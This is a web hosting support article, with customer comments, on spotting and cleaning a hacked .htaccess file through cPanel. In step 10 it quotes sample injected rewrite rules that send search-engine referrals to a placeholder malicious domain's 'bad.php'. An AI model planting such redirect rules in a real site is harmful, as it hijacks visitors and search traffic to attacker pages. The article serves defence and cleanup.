InMotion Hosting Support Center

In this article we'll discuss steps you can take to clean up an .htaccess hack. The .htaccess file is used to primarily setup rewrite rules to control the way your site is accessed. You might not notice that your .htaccess file has been hacked until either a manual investigation, or you happen to get a malware warning on your website that it's redirecting to a malicious site.

Sometimes you might catch down in your web-browser's status bar that a foreign website is attempting to load content on your website, or you might notice a web-browser warning. These can be common signs of a .htaccess hack, you might also notice that you've fallen in search engine rankings. The typical reason for this is that hackers will attempt to hack your .htaccess file so that when search engine bots crawl your website they are redirected to the website that the hacker has put in place instead of your own.

You can do a quick outside spot check using Google's Safe Browsing diagnostic page to see if they've detected anything malicious on your site in their most recent crawl. You would simply want to replace with your actual domain name in the following URL:

You can also read more about the Google Safe Browsing page.

Following the steps below you can learn how to check your .htaccess file for hacks, and how to clean them up if you do find any.

.htaccess hacked clean up steps

  1. Login to your cPanel.
  2. Under the Files section, click on File Manager.
  3. In the top right-hand corner, click on Settings. Select the Document Root for: option, and choose your domain from the drop-down.
  4. Ensure that Show Hidden Files is selected.
  5. Then click Save.
  6. file-manager-hidden-files
  7. Right-click on the .htaccess file and select Edit.
  8. file-manager-htaccess-edit
  9. You might have a text editor encoding dialog box pop-up, you can simply click on Edit.
  10. Scroll up and down the document and you'll want to look for any code that seems to be out of place, more than likely you'll see something along the following lines if your .htaccess file has been hacked:

    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .**$ [NC]
    RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]

    What this rewrite code is attempting to do is checking for the referrer of a request, if it's a popular search engine they are redirecting it to their MaliciousDomain.tld website and trying to load the bad.php malicious script.

    Because these RewriteCond conditional statements wouldn't match for yourself, and only for search engine bots, sometimes these types of hacks can go unnoticed for some time. Unfortunately the longer they're active the more potential it has at affecting your search engine ranking.

  11. To remove these malicious rewrites you can simply highlight all of the text and hit Delete on your keyboard and then click on Save Changesat the top-right to save the file.

    If you aren't 100% confident that you've found malicious redirect code, we would recommend backing up your .htaccess file prior to making edits to it. This can be accomplished by simply right-clicking on the .htaccess file in the File Manager, selecting Copy and then choosing a copy path such as /public_html/.htaccess-BAK, then finally clicking on Copy File(s).

You should now understand how to locate and remove a .htaccess hack that could be causing your website to do a malicious redirection. You'll more than likely also want to read about steps to take after a hack for more information on how to prevent hacks like this from taking place.

If you're on a VPS or dedicated server you might also wish to read about how to clean up a code injection attack if more than just your .htaccess file has been hacked.

Was this article helpful?

Related Questions

Here are a few questions related to this article that our customers have asked:
Ooops! It looks like there are no questions about this page.
Would you like to ask a question about this page? If so, click the button below!
Ask a Question

Support Center Login

Our Login page has moved, Click the button below to be taken to the login page.

n/a Points
2017-12-14 2:00 pm

I have a simple non-developer's question that, if some has this file (.htaccess) empty then what does it mean? Because recently I registered a domain and tried to upload a test marketplace software from a reputed company, they allowed me to upload their software on my domain. But when I noticed that (.htaccess) that file is empty. Immediately I came across the website and found the above mentioned information which make me worried about (.htaccess) now. So please advise if  (.htaccess) is empty is it dangerous for my domain or not ?

Awaiting your response ASAP



3,017 Points
2017-12-14 7:26 pm
Hi Ismail,

You shouldn't be concerned if the .htaccess file is blank. Also, some software will create/modify the .htaccess file "behind the scenes". You should really be concerned if your website is redirecting or behaving unexpectedly.
n/a Points
2017-05-12 8:22 am

I saved my .htaccess file, and deleted it from file tree.  Trying to create a new one but it asks me for the extension I should use for the new .htaccess file.  can you give me any pointers? .txt .php . .htm?  Thanks


2,858 Points
2017-05-12 10:01 am
Jeff, the .htaccess doesn't have a 'file extension' as this is a Windows convention, and Apache does not require it. You should save the file without an extension, and then re-upload it.
n/a Points
2017-03-23 3:34 pm

I had the same problem, but compared infectedfiles list towards a backupcopy and could determine from which date the hack was made and also if the files that where infected according to that list existed before that date.

There where a new htaccess file in all main folders of all plugins and about 20 NEW files and 8 changed files.

All sorted out now, killed all "NEW files and reloaded the changed files from the backup date before all happened.


31,313 Points
2017-03-23 3:49 pm
Well done sir! We are glad you were able to recover successfully.

Thank you,
n/a Points
2017-03-18 8:22 pm

I have this too, there are htaccess files on all my plugins mainfolders, all are redirecting only mobile traffic to which is from China according to whois.

I have taken them all away but there is still something that is working badly as everytime I access my webpage through mobile it continous redirecting me to porn sites!


43,761 Points
2017-03-20 2:42 pm
If you have cleaned as much as you know how, be sure to contact your hosting support team to see if they can assist you further. There may be an additional file or something that was overlooked.
n/a Points
2017-02-22 2:32 am

I am trying to do that but again after some time facing same proble with unwanted content on .htacces file like your code. and redirect my website on another link. can i fix this proble for permanently.

13,821 Points
2017-02-22 9:26 am
Sounds like the hack is more extensive than just the htaccess file. You need to find the file thats making the changes to the htaccess file.

Post a Comment

Email Address:
Phone Number:

Please note: Your name and comment will be displayed, but we will not show your email address.

10 Questions & Comments

Post a comment

Back to first comment | top

Need more Help?


Ask the Community!

Get help with your questions from our community of like-minded hosting users and InMotion Hosting Staff.

Current Customers

Chat: Click to Chat Now E-mail:
Call: 888-321-HOST (4678) Ticket: Submit a Support Ticket

Not a Customer?

Get web hosting from a company that is here to help. Sign up today!